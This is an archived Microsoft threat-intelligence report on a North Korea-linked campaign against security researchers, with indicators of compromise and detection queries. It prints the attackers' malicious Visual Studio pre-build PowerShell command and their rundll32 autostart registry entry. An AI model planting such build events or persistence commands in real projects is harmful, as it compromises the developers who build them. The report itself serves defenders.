{ "id": "8ec6b543-e7d3-4c4a-ae86-4c6fa4be10c1", "created_at": "2026-04-06T01:30:55.656429Z", "updated_at": "2026-04-10T03:38:19.782058Z", "deleted_at": null, "sha1_hash": "dddfee5671f3436a8a1a59845e4983c3453df15b", "title": "ZINC attacks against security researchers", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 428202, "plain_text": "ZINC attacks against security researchers\r\nBy Microsoft Threat Intelligence\r\nPublished: 2021-01-28 · Archived: 2026-04-06 00:28:34 UTC\r\nApril 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned\r\naround the theme of weather. Zinc is now tracked as Diamond Sleet.\r\nTo learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a\r\ncomplete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming\r\ntaxonomy.\r\nIn recent months, Microsoft has detected cyberattacks targeting security researchers by an actor we track as ZINC.\r\nThe campaign originally came to our attention after Microsoft Defender for Endpoint detected an attack in\r\nprogress. Observed targeting includes pen testers, private offensive security researchers, and employees at security\r\nand tech companies. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence\r\nto ZINC, a DPRK-affiliated and state-sponsored group, based on observed tradecraft, infrastructure, malware\r\npatterns, and account affiliations.\r\nThis ongoing campaign was reported by Google’s Threat Analysis Group (TAG) earlier this week, capturing the\r\nbrowser-facing impact of this attack. By sharing additional details of the attack, we hope to raise awareness in the\r\ncybersecurity community about additional techniques used in this campaign and serve as a reminder to security\r\nprofessionals that they are high-value targets for attackers.\r\nWe also want to thank our industry colleagues at Twitter and GitHub for their collaboration in this investigation\r\nand rapid actions to suspend the malicious accounts targeting the security community and our mutual customers.\r\nWe are sharing this information with the community as part of our mission to shine a light on bad actors and\r\nelevate awareness of low-profile tactics and techniques that easily fly under the radar of security operations\r\ncenters (SOCs) or security professionals and are easily overlooked as low-level alerts or benign chatter. The\r\nrelated IoCs and Microsoft Defender for Endpoint product detections we share in this blog will help SOCs\r\nproactively hunt for related activity in their environments and elevate any low-level alerts for remediation. ZINC\r\nused a variety of new techniques to target the victims, including gaining credibility on social media with genuine\r\ncontent, sending malicious Visual Studio projects, and using a watering hole website weaponized with browser\r\nexploits.\r\nTechnical details\r\nIn mid-2020, ZINC started building a reputation in the security research community on Twitter by retweeting high\r\nquality security content and posting about exploit research from an actor-controlled blog. Throughout the lifetime\r\nof the campaign, the actor operated several accounts that accounted for roughly 2,000 followers, including many\r\nprominent security researchers.\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 1 of 15\n\nIn the image below, one of the actor-controlled Twitter account retweets another of their accounts to amplify their\r\nown posts. The posts from the actors received a reasonable amount of attention, usually accumulating several\r\nhundred likes or retweets.\r\nFigure 1. Actor-controlled Twitter handles\r\nAfter building their reputation across their established social media accounts, the actors started approaching\r\npotential targets on social media platforms such as Twitter and LinkedIn. The conversations were often seemingly\r\ninnocuous, asking security questions or talking about exploit techniques. If the researcher was responsive, the\r\nactor would offer to move communication to another platform (e.g., email, Discord) in some cases to then send\r\nfiles using encrypted or PGP protected ZIPs.\r\nZINC also used their Twitter accounts to post links to a security blog they owned (br0vvnn[.]io). These links were\r\nalso shared by many others in the security community on Twitter and other social media platforms, further\r\ndeepening trust for the owner and content.\r\nA blog post titled DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug, was shared by the\r\nactor on October 14, 2020 from Twitter. From October 19-21, 2020, some researchers, who hadn’t been contacted\r\nor sent any files by ZINC profiles, clicked the links while using the Chrome browser, resulting in known ZINC\r\nmalware on their machines soon after. This suggests that a Chrome browser exploit chain was likely hosted on the\r\nblog, although we haven’t been able to prove this. Since some of the victim’s browsers were fully patched, it’s\r\nalso suspected, but unproven, that the exploit chain used 0-day or patch gap exploits. We believe that not all\r\nvisitors to the site were compromised, even during the dates listed above.\r\nMalicious Visual Studio project\r\nSome of the files sent by ZINC to researchers were malicious Visual Studio projects that included prebuilt\r\nbinaries. One of the binaries used the well-known name Browse.vc.db but was a malicious DLL rather than a\r\ndatabase file. Microsoft Defender for Endpoint detects these DLLs as Comebacker malware. A pre-build event\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 2 of 15\n\nwith a PowerShell command was used to launch Comebacker via rundll32. This use of a malicious pre-build event\r\nis an innovative technique to gain execution.\r\nAn example of the PowerShell in the pre-build event can be seen here:\r\n\u003cprebuildevent\u003e\r\n\u003ccommand\u003e\u003c/command\u003e\r\npowershell -executionpolicy bypass -windowstyle hidden\r\nif(([system.environment]::osversion.version.major -eq 10) -and\r\n[system.environment]::is64bitoperatingsystem -and (Test-Path x64\\Debug\\Browse.VC.db)){rundll32\r\nx64\\Debug\\Browse.VC.db,ENGINE_get_RAND 7am1cKZAEb9Nl1pL 4201 }\r\n\u003c/prebuildevent\u003e\r\nPre-build events are stored in the .vcxproj file in Visual Studio solutions. The page How to: Use Build Events in\r\nMSBuild Projects has a list of other build events and example XML for the events. It would also be possible to\r\nabuse a custom build step in the same way.\r\nAnalyzing Comebacker DLLs\r\nOnce the malicious Visual Studio Project file was built, the process\r\ndrops C:\\ProgramData\\VirtualBox\\update.bin and adds the file to an autostart registry key. Update.bin (SHA-256: 25d8ae46…) is a different 64-bit DLL file embedded inside Browser.VC.db.\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update\r\n“C:\\Windows\\System32\\rundll32.exe C:\\ProgramData\\VirtualBox\\update.bin,ASN2_TYPE_new\r\n5I9YjCZ0xlV45Ui8 2907”\r\nThe actors put some effort into modifying the Comebacker malware attributes between deployments; file names,\r\nfile paths and exported functions were regularly changed so these static IOCs can’t be solely relied upon for\r\ndependable detection. We were first alerted to the attack when Microsoft Defender for Endpoint detected the\r\nComebacker DLL attempting to perform process privilege escalation. See the Microsoft Defender for Endpoint\r\ndetections section for a full process chain of the attack.\r\nKlackring malware\r\nKlackring is a DLL that registers a malicious service on the targeted machine. It was deployed to victims either by\r\nthe Comebacker malware or an unknown dropper. The DLL was dropped to C:\\Windows\\system32 and saved with\r\nthe .sys file extension.\r\nMHTML file\r\nIn addition to the social engineering attacks via social media platforms, we observed that ZINC sent researchers a\r\ncopy of a br0vvnn blog page saved as an MHTML file with instructions to open it with Internet Explorer. The\r\nMHTML file contained some obfuscated JavaScript that called out to a ZINC-controlled domain for further\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 3 of 15\n\nJavaScript to execute. The site was down at the time of investigation and we have not been able to retrieve the\r\npayload for further analysis.\r\nDriver abuse\r\nIn one instance, we discovered the actor had downloaded an old version of the Viraglt64.sys driver from the Vir.IT\r\neXplorer antivirus. The file was dropped to the victim system as C:\\Windows\\System32\\drivers\\circlassio.sys. The\r\nactor then attempted to exploit CVE-2017-16238, described by the finder here, where the driver doesn’t perform\r\nadequate checking on a buffer it receives, which can be abused to gain an arbitrary kernel write primitive. The\r\nactor’s code however appears to be buggy and when attempting to exploit the vulnerability the exploit tried to\r\noverwrite some of the driver’s own code which crashed the victim’s machine.\r\nOther malware\r\nOther tools used included an encrypted Chrome password-stealer hosted on ZINC\r\ndomain https://codevexillium[.]org. The host DLL (SHA-256: ada7e80c…) was downloaded to the\r\npath C:\\ProgramData\\USOShared\\USOShared.bin using PowerShell and then ran via rundll32.  This malware is a\r\nweaponized version of CryptLib, and it decrypted the Chrome password stealer (SHA-256: 9fd0506…), which it\r\ndropped to C:\\ProgramData\\USOShared\\USOShared.dat.\r\nC2 communication\r\nAfter establishing a command-and-control (C2) channel on a targeted device, the backdoor is configured to check\r\ninto the C2 servers every 60 seconds. Over this C2 channel, the threat actors can execute remote commands to\r\nenumerate files/directories and running processes, and to collect/upload information about the target device,\r\nincluding IP address, Computer Name, and NetBIOS.  Furthermore, we observed some hands-on-keyboard action\r\nto enumerate all files/directories on the target disk, create screenshots, and deploy additional modules.\r\nMicrosoft Defender for Endpoint detections\r\nWhen malware is run from a malicious Visual Studio project, the following alerts and process tree are generated\r\nby Microsoft Defender for Endpoint. Multiple alerts, including “Use of living-off-land binary to run malware” and\r\n“Process Privilege escalation”, were triggered on the execution of Browser.VC.db and update.bin.\r\nMicrosoft Defender for Endpoint has comprehensive detection coverage for this campaign. These detections raise\r\nalerts that inform security operations teams about the presence of activities and artifact from the attacks. Security\r\noperations and incident response teams can use investigation and remediation tools in Microsoft Defender\r\nEndpoint to perform deep investigation and additional hunting.\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 4 of 15\n\nFigure 2. Alert raised by Microsoft Defender for Endpoint on ComeBacker\r\nFigure 3. Alert raised by Microsoft Defender for Endpoint on low-reputation arbitrary code executed by signed\r\nexecutable\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 5 of 15\n\nRecommended actions and preventative measures\r\nIf you visited the referenced ZINC-owned blog (br0vvnn[.]io), you should immediately run a full antimalware\r\nscan and use the provided IOCs to check your systems for intrusion. If a scan or searching for the IOCs find any\r\nrelated malware on your systems, you should assume full compromise and rebuild. Microsoft assesses that\r\nsecurity research was the likely objective of the attack, and any information on the affected machine may be\r\ncompromised.\r\nFor proactive prevention of this type of attack, it is recommended that security professionals use an isolated\r\nenvironment (e.g., a virtual machine) for building untrusted projects in Visual Studio or opening any links or files\r\nsent by unknown parties.\r\nAssociated indicators of compromise (IOCs)\r\nThe below list provides IOCs observed during this activity. We encourage our customers to implement detections\r\nand protections to identify possible prior campaigns or prevent future campaigns against their systems.\r\nAzure Sentinel customers can find a Sentinel query containing these indicators in this GitHub\r\nrepo: https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/ZincJan272021IOCs.yaml\r\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub\r\nrepo: https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/\r\nMicrosoft Defender for Endpoint detections for malware\r\nBackdoor:Script/ComebackerCompile.A!dha\r\nTrojan:Win64/Comebacker.A!dha\r\nTrojan:Win64/Comebacker.A.gen!dha\r\nTrojan:Win64/Comebacker.B.gen!dha\r\nTrojan:Win32/Comebacker.C.gen!dha\r\nTrojan:Win32/Klackring.A!dha\r\nTrojan:Win32/Klackring.B!dha\r\nActor-controlled Twitter Handles\r\nhttps://twitter.com/z055g\r\nhttps://twitter.com/james0x40\r\nhttps://twitter.com/mvp4p3r\r\nhttps://twitter.com/dev0exp\r\nhttps://twitter.com/BrownSec3Labs\r\nhttps://twitter.com/br0vvnn\r\nhttps://twitter.com/0xDaria\r\nActor-controlled LinkedIn profiles\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 6 of 15\n\nhttps://www.linkedin.com/in/james-williamson-55a9b81a6/\r\nhttps://www.linkedin.com/in/guo-zhang-b152721bb/\r\nhttps://www.linkedin.com/in/linshuang-li-aa69391bb/\r\nActor-controlled GitHub Accounts\r\nFurther investigation revealed a number of GitHub accounts with names matching the Twitter handles published\r\nby Google:\r\nhttps://github.com/br0vvnn\r\nhttps://github.com/dev0exp\r\nhttps://github.com/henya290\r\nhttps://github.com/james0x40\r\nhttps://github.com/tjrim91\r\nActor-controlled blog URLs\r\nhttps://br0vvnn[.]io\r\nhttps://blog.br0vvnn[.]io\r\nActor-controlled C2 domains\r\ncodevexillium[.]org\r\nangeldonationblog[.]com\r\ninvestbooking[.]de\r\nkrakenfolio[.]com\r\nLikely legitimate but compromised websites used as C2\r\nwww.dronerc[.]it\r\nwww.edujikim[.]com\r\nwww.fabioluciani[.]com\r\ntrophylab[.]com\r\nforums.joycity[.]com\r\nMarcodetech[.]net\r\nLinelcssplugin[.]org\r\nC2 URLs\r\nhttps://codevexillium[.]org/image/download/download.asp\r\nhttps://angeldonationblog[.]com/image/upload/upload.php\r\nhttps://www.dronerc[.]it/shop_testbr/Core/upload.php\r\nhttps://www.dronerc[.]it/forum/uploads/index.php\r\nhttps://www.dronerc[.]it/shop_testbr/upload/upload.php\r\nhttps://www.edujikim[.]com/intro/blue/insert.asp\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 7 of 15\n\nhttps://investbooking[.]de/upload/upload.asp\r\nMalware hashes\r\nMalicious Visual Studio .vcxproj files\r\n0ac5c8ad0c2ddef4d41724acac586ffabcc92ab9d4906a4fc4a1ff2ec2feec7c\r\n1cc60cb1e08779ff140dfbb4358a7c2587ba58ad2f1f23343b9efb51bb25aaed\r\n5024f199836692fe428aef3d41a561448632e9cbab954f842ef300573600423d\r\n98a6e0c8b8ec4dbbc3ef21308ec04912fa38e84828cedad99e081d588811ba5e\r\nd02752aadc71fafa950a6a51b1298dc914e81d20f95a86b12ee07cd2d2a85711\r\nComebacker malware\r\n0acf21fba2b46ad2dd9c0da887f0fda704e7a5569b735c288d43a57688eb53fa\r\n133280e985448a3cfa8906830af137634c4657740a8c7209a368c5a0d0b3dabf\r\n25d8ae4678c37251e7ffbaeddc252ae2530ef23f66e4c856d98ef60f399fa3dc\r\n284df008aa2459fd1e69b1b1c54fb64c534fce86d2704c4d4cc95d72e8c11d6f\r\n34e13e2efb336fbe8202ca931a496aa451cf554450806b63d25a57a627e0fb65\r\n39ad9ae3780c2f6d41b1897e78f2b2b6d549365f5f024bc68d1fe794b940f9f1\r\n4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244\r\n68e6b9d71c727545095ea6376940027b61734af5c710b2985a628131e47c6af7\r\n80a19caf4cfc9717d449975f98a157d0a483bf48a05e3b6f7a9b204faa8c35d1\r\n88aeaff0d989db824d6e9429cd94bc22bbbfc39775c0929e703343798f69e9cc\r\n913871432989378a042f5023351c2fa2c2f43b497b75ef2a5fd16d65aa7d0f54\r\nca48fa63bd603c74ab02841fc6b6e90c29a9b740232628fadafa923d2833a314\r\nd0678fe8c92912698c4b9d4d03d83131e16d8b219ccf373fa847da476788785b\r\n5815103140c68614fd7fc05bad540e654a37b81b7e451e213128f2eff081005a\r\ne413e8094d76061f094f8b9339d00d80514065f7d37c184543c0f80c5d51bd80\r\nc23f50c8014c190afa14b4c2c9b85512fb3a75405652c9b6be1401f678295f36\r\na75886b016d84c3eaacaf01a3c61e04953a7a3adf38acf77a4a2e3a8f544f855\r\nKlackring malware\r\n0acf21fba2b46ad2dd9c0da887f0fda704e7a5569b735c288d43a57688eb53fa\r\n16ad21aedf8f43fcedaa19dbd4f4fda0f3fec0517662b99a3054dac6542ab865\r\n1d9a58bc9b6b22fb3e3099996dbab13bfc5258b8307026f66fa69729d40f2b13\r\n4bfeb22ec438cf7ed8a7fefe6e7f321d842ad6ade0ca772732d1a757177e7ad7\r\n6b3a693d391426182fc2944d14b0816cdf1e5f87c13d6eb697756f9577b0bcee\r\n70e1f774c0c80e988641d709d3a6990193e039b1ce618ceaacc1d61a850e9b76\r\n77a9a0f67d09cafaf05ee090483a64622a7a04dfe226763f68651b071c1802f2\r\n8d85e31de2623538a42a211e3919d5602f99dc80f21e0c5f99d53838b2b07063\r\n90b4bd609b84c41beeed5b9310f2d84de83c74aaecfd1facc02e278be5059110\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 8 of 15\n\n9c90bbe4b61136d94170e90c299adab0d1ccbc3a8f71519799dd901d742f3561\r\n9f23069f74d0fb09823ad7f46f338d7920a731622404a7754df36ffbc40f8744\r\na1c4c617d99d10bbb2524b4d5bfdcf00f47d9cf39e8c7d3e6a9ce1219393da5a\r\na4fb20b15efd72f983f0fb3325c0352d8a266a69bb5f6ca2eba0556c3e00bd15\r\naa5264323755a7dfa7c39ada09224c8c1de03ec8aeb6f7b216a56e8475e5f547\r\naeb6fb0ba6d947b4ee67a5111fbdf798c4488377ae28bdf537c1f920a58785b7\r\nb47969e73931546fdcfb1e69c43da911dc9f7bb8d0e211731a253b572ecdc4fe\r\nbc19a9415428973d65358291d604d96a0915a01d4b06939269b9e210f23aad43\r\nc5d13324100047d7def82eeafdb6fc98cc2ccfae56db66ada9f1c3c7429ef9cb\r\ndcc986c48c9c99c012ae2b314ac3f2223e217aee2ccdfb733cbbdaea0b713589\r\ne8cf9b04ba7054e1c34bda05106478f9071f8f6569b4822070834abbf8e07a95\r\nb32319da446dcf83378ab714f5ad0229dff43c9c6b345b69f1a397c951c1122e\r\n11fef660dec27474c0c6c856a7b4619155821fdd1ce404848513a2700be806a5\r\n9e562cc5c3eb48a5f1a1ccd29bf4b2ff4ab946f45aa5d8ea170f69104b684023\r\nviaglt64.sys – Vulnerable Vir.IT driver for CVE-2017-16238\r\n58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495\r\nOther malware and tools\r\nThese are hashes of files we believe to be related to the attack but aren’t Comebacker or Klackring malware.\r\nThis list includes some hashes where we haven’t been able to retrieve a sample but based on the file usage or\r\nlocation looks likely to be related.\r\ne0e59bfc22876c170af65dcbf19f744ae560cc43b720b23b9d248f4505c02f3e\r\n3d3195697521973efe0097a320cbce0f0f98d29d50e044f4505e1fbc043e8cf9\r\n0a2d81164d524be7022ba8fd4e1e8e01bfd65407148569d172e2171b5cd76cd4\r\n96d7a93f6691303d39a9cc270b8814151dfec5683e12094537fd580afdf2e5fe\r\ndc4cf164635db06b2a0b62d313dbd186350bca6fc88438617411a68df13ec83c\r\n46efd5179e43c9cbf07dcec22ce0d5527e2402655aee3afc016e5c260650284a\r\n95e42a94d4df1e7e472998f43b9879eb34aaa93f3705d7d3ef9e3b97349d7008\r\n9d5320e883264a80ea214077f44b1d4b22155446ad5083f4b27d2ab5bd127ef5\r\n9fd05063ad203581a126232ac68027ca731290d17bd43b5d3311e8153c893fe3\r\nada7e80c9d09f3efb39b729af238fcdf375383caaf0e9e0aed303931dc73b720\r\nedb1597789c7ed784b85367a36440bf05267ac786efe5a4044ec23e490864cee\r\n33665ce1157ddb7cd7e905e3356b39245dfba17b7a658bdbf02b6968656b9998\r\n3ab770458577eb72bd6239fe97c35e7eb8816bce5a4b47da7bd0382622854f7c\r\nb630ad8ffa11003693ce8431d2f1c6b8b126cd32b657a4bfa9c0dbe70b007d6c\r\n53f3e55c1217dafb8801af7087e7d68b605e2b6dde6368fceea14496c8a9f3e5\r\n99c95b5272c5b11093eed3ef2272e304b7a9311a22ff78caeb91632211fcb777\r\nf21abadef52b4dbd01ad330efb28ef50f8205f57916a26daf5de02249c0f24ef\r\n2cbdea62e26d06080d114bbd922d6368807d7c6b950b1421d0aa030eca7e85da\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 9 of 15\n\n079659fac6bd9a1ce28384e7e3a465be4380acade3b4a4a4f0e67fd0260e9447\r\n0b9133bc24593a358c0471da4aa9c7479270dab93c0941e5132af6ba177c5228\r\nHost IOCs\r\nComebacker Visual Studio Project file execution\r\nRundll32.exe dxgkrnl_poc.vcxproj.suo,CMS_dataFinal Bx9yb37GEcJNK6bt 4231\r\nComebacker file names and exported function name\r\nNote that the file name was often changed and these names shouldn’t be considered a definitive list:\r\nBrowse.vc.db,ENGINE_get_RAND\r\nNVIDIA.bin,SSL_HandShaking\r\nadobe.bin,SSL_HandShaking\r\nUSOShared.bin,ntWindowsProc\r\nupdate.dat,SetWebFilterString\r\nupdate.bin,CleanupBrokerString\r\nntuser.db,glInitSampler\r\nRdrCEF.bin,json_object_get_unicode_string\r\nupdate.bin,ASN2_TYPE_new\r\nUSO.DAT,deflateSuffix\r\nUSO.DAT,cmsSetLogHandlerTHR\r\nUSO.DAT,sql_blob_open\r\nlocaldb.db,ntSystemInfo\r\nRegistry Key\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update\r\nFile path\r\nKlackring\r\nThis malware was deployed as a .sys file in C:\\windows\\system32\\\r\nC:\\Windows\\System32\\helpsvc.sys\r\nC:\\Windows\\System32\\Irmon.sys\r\nC:\\Windows\\System32\\LogonHours.sys\r\nC:\\Windows\\System32\\Ntmssvc.sys\r\nC:\\Windows\\System32\\NWCWorkstation.sys\r\nC:\\Windows\\System32\\Nwsapagent.sys\r\nC:\\Windows\\System32\\PCAudit.sys\r\nC:\\Windows\\System32\\uploadmgr.sys\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 10 of 15\n\nGeneric folders and file paths for malware and tooling\r\nThese are folders and file paths that have been used by ZINC for malware and tools but may be used by other\r\nactors or produce false positives.\r\nLook for .bin, .db, .dat, and .cpl files in the following folders, USOShared was most used across victims:\r\nC:\\ProgramData\\USOShared\\\r\nC:\\ProgramData\\Adobe\\\r\nC:\\ProgramData\\Mozilla\\\r\nC:\\ProgramData\\NVIDIA\\\r\nC:\\ProgramData\\Oracle\\\r\nC:\\ProgramData\\VirtualBox\\\r\nCheck these file paths for additional malware and tooling:\r\nC:\\MSCache\\msomui.dat\r\nC:\\MSCache\\local.cpl\r\nC:\\ProgramData\\ntuser.db\r\nC:\\ProgramData\\ntuser.ini\r\nC:\\ProgramData\\taskhost.exe\r\nC:\\ProgramData\\Adobe\\get.exe\r\nC:\\ProgramData\\Adobe\\ARM\\AdobeUpdate.exe\r\nC:\\ProgramData\\Mozilla\\update.bin\r\nC:\\ProgramData\\NVIDIA\\graphicscheck.exe\r\nC:\\ProgramData\\NVIDIA\\NVIDIA.bin\r\nC:\\ProgramData\\Oracle\\java.db\r\nC:\\ProgramData\\Oracle\\java.cpl\r\nC:\\ProgramData\\USOShared\\Search.bin\r\nC:\\Windows\\netsvc.exe\r\nC:\\Windows\\system32\\kjchost.dll\r\nC:\\Windows\\System32\\traextapi.dll\r\nC:\\Windows\\System32\\healthextapi.dll\r\nC:\\Windows\\System32\\detaextapi.dll\r\nC:\\Windows\\Temp\\ads.tmp\r\nC:\\windows\\Temp\\CA_Root.pfx\r\nC:\\Recovery\\recover.bin\r\nC:\\Recovery\\re.bin\r\nAdvanced hunting queries\r\nTo locate possible exploitation activity related to the contents of this blog, you can run the following advanced\r\nhunting queries via Microsoft Defender for Endpoint:\r\nCommand and control\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 11 of 15\n\nLook for backdoor establishing network connections to command and control. Run query in Microsoft Defender\r\nfor Endpoint\r\nDeviceNetworkEvents\r\n| where RemoteUrl in~('codevexillium.org',\r\n'angeldonationblog.com',\r\n'investbooking.de',\r\n'krakenfolio.com')\r\nExecution\r\nLook for PowerShell launched from MSBUILD with the related commands. Run Query in Microsoft Defender for\r\nEndpoint\r\nDeviceProcessEvents\r\n| where FileName =~ \"powershell.exe\"\r\n| where ProcessCommandLine has \"is64bitoperatingsystem\"\r\nand ProcessCommandLine has \"Debug\\\\Browse\"\r\nMalicious files\r\nLook for the presence of malicious files related to this threat. Run the below query in Microsoft Defender for\r\nEndpoint\r\nDeviceFileEvents\r\n| where SHA256 in~(\r\n// Malicious Visual Studio .vcxproj files\r\n'0ac5c8ad0c2ddef4d41724acac586ffabcc92ab9d4906a4fc4a1ff2ec2feec7c',\r\n'1cc60cb1e08779ff140dfbb4358a7c2587ba58ad2f1f23343b9efb51bb25aaed',\r\n'5024f199836692fe428aef3d41a561448632e9cbab954f842ef300573600423d',\r\n'98a6e0c8b8ec4dbbc3ef21308ec04912fa38e84828cedad99e081d588811ba5e',\r\n'd02752aadc71fafa950a6a51b1298dc914e81d20f95a86b12ee07cd2d2a85711',\r\n// Comebacker Malware\r\n'0acf21fba2b46ad2dd9c0da887f0fda704e7a5569b735c288d43a57688eb53fa',\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 12 of 15\n\n'133280e985448a3cfa8906830af137634c4657740a8c7209a368c5a0d0b3dabf',\r\n'25d8ae4678c37251e7ffbaeddc252ae2530ef23f66e4c856d98ef60f399fa3dc',\r\n'284df008aa2459fd1e69b1b1c54fb64c534fce86d2704c4d4cc95d72e8c11d6f',\r\n'34e13e2efb336fbe8202ca931a496aa451cf554450806b63d25a57a627e0fb65',\r\n'39ad9ae3780c2f6d41b1897e78f2b2b6d549365f5f024bc68d1fe794b940f9f1',\r\n'4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244',\r\n'68e6b9d71c727545095ea6376940027b61734af5c710b2985a628131e47c6af7',\r\n'80a19caf4cfc9717d449975f98a157d0a483bf48a05e3b6f7a9b204faa8c35d1',\r\n'88aeaff0d989db824d6e9429cd94bc22bbbfc39775c0929e703343798f69e9cc',\r\n'913871432989378a042f5023351c2fa2c2f43b497b75ef2a5fd16d65aa7d0f54',\r\n'ca48fa63bd603c74ab02841fc6b6e90c29a9b740232628fadafa923d2833a314',\r\n'd0678fe8c92912698c4b9d4d03d83131e16d8b219ccf373fa847da476788785b',\r\n'5815103140c68614fd7fc05bad540e654a37b81b7e451e213128f2eff081005a',\r\n'e413e8094d76061f094f8b9339d00d80514065f7d37c184543c0f80c5d51bd80',\r\n'c23f50c8014c190afa14b4c2c9b85512fb3a75405652c9b6be1401f678295f36',\r\n'a75886b016d84c3eaacaf01a3c61e04953a7a3adf38acf77a4a2e3a8f544f855',\r\n// Klackring Malware\r\n'0acf21fba2b46ad2dd9c0da887f0fda704e7a5569b735c288d43a57688eb53fa',\r\n'16ad21aedf8f43fcedaa19dbd4f4fda0f3fec0517662b99a3054dac6542ab865',\r\n'1d9a58bc9b6b22fb3e3099996dbab13bfc5258b8307026f66fa69729d40f2b13',\r\n'4bfeb22ec438cf7ed8a7fefe6e7f321d842ad6ade0ca772732d1a757177e7ad7',\r\n'6b3a693d391426182fc2944d14b0816cdf1e5f87c13d6eb697756f9577b0bcee',\r\n'70e1f774c0c80e988641d709d3a6990193e039b1ce618ceaacc1d61a850e9b76',\r\n'77a9a0f67d09cafaf05ee090483a64622a7a04dfe226763f68651b071c1802f2',\r\n'8d85e31de2623538a42a211e3919d5602f99dc80f21e0c5f99d53838b2b07063',\r\n'90b4bd609b84c41beeed5b9310f2d84de83c74aaecfd1facc02e278be5059110',\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 13 of 15\n\n'9c90bbe4b61136d94170e90c299adab0d1ccbc3a8f71519799dd901d742f3561',\r\n'9f23069f74d0fb09823ad7f46f338d7920a731622404a7754df36ffbc40f8744',\r\n'a1c4c617d99d10bbb2524b4d5bfdcf00f47d9cf39e8c7d3e6a9ce1219393da5a',\r\n'a4fb20b15efd72f983f0fb3325c0352d8a266a69bb5f6ca2eba0556c3e00bd15',\r\n'aa5264323755a7dfa7c39ada09224c8c1de03ec8aeb6f7b216a56e8475e5f547',\r\n'aeb6fb0ba6d947b4ee67a5111fbdf798c4488377ae28bdf537c1f920a58785b7',\r\n'b47969e73931546fdcfb1e69c43da911dc9f7bb8d0e211731a253b572ecdc4fe',\r\n'bc19a9415428973d65358291d604d96a0915a01d4b06939269b9e210f23aad43',\r\n'c5d13324100047d7def82eeafdb6fc98cc2ccfae56db66ada9f1c3c7429ef9cb',\r\n'dcc986c48c9c99c012ae2b314ac3f2223e217aee2ccdfb733cbbdaea0b713589',\r\n'e8cf9b04ba7054e1c34bda05106478f9071f8f6569b4822070834abbf8e07a95',\r\n'b32319da446dcf83378ab714f5ad0229dff43c9c6b345b69f1a397c951c1122e',\r\n'11fef660dec27474c0c6c856a7b4619155821fdd1ce404848513a2700be806a5',\r\n'9e562cc5c3eb48a5f1a1ccd29bf4b2ff4ab946f45aa5d8ea170f69104b684023',\r\n// viaglt64.sys – Vulnerable Vir.IT driver for CVE-2017-16238\r\n'58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495'\r\n// Other potentially related malware and tools\r\n'e0e59bfc22876c170af65dcbf19f744ae560cc43b720b23b9d248f4505c02f3e',\r\n'3d3195697521973efe0097a320cbce0f0f98d29d50e044f4505e1fbc043e8cf9',\r\n'0a2d81164d524be7022ba8fd4e1e8e01bfd65407148569d172e2171b5cd76cd4',\r\n'96d7a93f6691303d39a9cc270b8814151dfec5683e12094537fd580afdf2e5fe',\r\n'dc4cf164635db06b2a0b62d313dbd186350bca6fc88438617411a68df13ec83c',\r\n'46efd5179e43c9cbf07dcec22ce0d5527e2402655aee3afc016e5c260650284a',\r\n'95e42a94d4df1e7e472998f43b9879eb34aaa93f3705d7d3ef9e3b97349d7008',\r\n'9d5320e883264a80ea214077f44b1d4b22155446ad5083f4b27d2ab5bd127ef5',\r\n'9fd05063ad203581a126232ac68027ca731290d17bd43b5d3311e8153c893fe3',\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 14 of 